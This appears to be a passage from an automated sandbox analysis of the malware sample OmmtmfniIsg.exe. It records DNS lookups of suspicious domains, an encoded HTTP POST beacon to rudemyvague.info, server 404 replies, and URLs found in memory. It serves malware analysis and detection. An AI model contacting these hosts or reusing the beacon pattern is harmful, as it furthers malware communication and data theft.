            Source: global trafficDNS traffic detected: DNS query: www.mondayigboleague.info
            Source: global trafficDNS traffic detected: DNS query: www.stocksm.fun
            Source: global trafficDNS traffic detected: DNS query: www.drevohome.shop
            Source: global trafficDNS traffic detected: DNS query: www.givingaway123.net
            Source: global trafficDNS traffic detected: DNS query: www.jagdud.store
            Source: global trafficDNS traffic detected: DNS query: www.030002837.xyz
            Source: global trafficDNS traffic detected: DNS query: www.ethetf.digital
            Source: global trafficDNS traffic detected: DNS query: www.booosted.xyz
            Source: global trafficDNS traffic detected: DNS query: www.djazdgc.tokyo
            Source: global trafficDNS traffic detected: DNS query: www.productanalytics.pro
            Source: global trafficDNS traffic detected: DNS query: www.kmjai8jf.icu
            Source: unknownHTTP traffic detected: POST /t7t4/ HTTP/1.1Host: www.rudemyvague.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enOrigin: http://www.rudemyvague.infoReferer: http://www.rudemyvague.info/t7t4/Content-Length: 210Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36Data Raw: 71 46 48 6c 49 3d 45 4f 73 66 47 75 4e 45 7a 67 6d 2f 56 6e 6f 42 37 71 2b 53 35 7a 5a 65 62 2f 30 50 68 4d 5a 61 38 4f 6a 57 76 43 65 74 76 46 49 62 66 74 4f 6d 4f 6d 72 37 51 51 2f 4f 70 66 56 39 4e 64 49 61 50 56 55 39 51 35 63 35 70 6e 53 6d 5a 4a 37 63 6f 2f 6d 58 4e 58 71 65 61 43 69 72 6a 54 32 67 64 2b 73 39 48 51 70 71 72 36 64 39 72 61 6e 2b 52 47 42 58 37 56 56 69 2f 75 75 64 62 33 42 37 6c 34 30 4c 30 51 52 51 30 2b 6f 48 77 50 59 6c 69 45 79 79 2b 34 41 59 38 4d 6d 4a 4c 46 41 53 63 6b 53 2b 45 70 69 30 50 50 57 35 59 30 41 70 56 64 41 2f 4c 58 59 35 6f 2f 49 6e 42 47 46 30 53 43 41 63 2b 51 4e 42 56 72 4f 51 Data Ascii: qFHlI=EOsfGuNEzgm/VnoB7q+S5zZeb/0PhMZa8OjWvCetvFIbftOmOmr7QQ/OpfV9NdIaPVU9Q5c5pnSmZJ7co/mXNXqeaCirjT2gd+s9HQpqr6d9ran+RGBX7VVi/uudb3B7l40L0QRQ0+oHwPYliEyy+4AY8MmJLFASckS+Epi0PPW5Y0ApVdA/LXY5o/InBGF0SCAc+QNBVrOQ
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Oct 2024 15:26:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Oct 2024 15:26:54 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Oct 2024 15:26:57 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Oct 2024 15:26:59 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 21 Oct 2024 15:27:05 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 21 Oct 2024 15:27:08 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 21 Oct 2024 15:27:10 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 21 Oct 2024 15:27:13 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: OmmtmfniIsg.exe, 00000006.00000002.4645986744.00000000040B0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://emailverification.info/
            Source: OmmtmfniIsg.exe, 00000006.00000002.4645986744.0000000003744000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.givingaway123.net/1juc/?DJ=uNx48jdPyvmhqtM0&qFHlI=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2
            Source: OmmtmfniIsg.exe, 00000006.00000002.4649388492.0000000004B63000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.productanalytics.pro
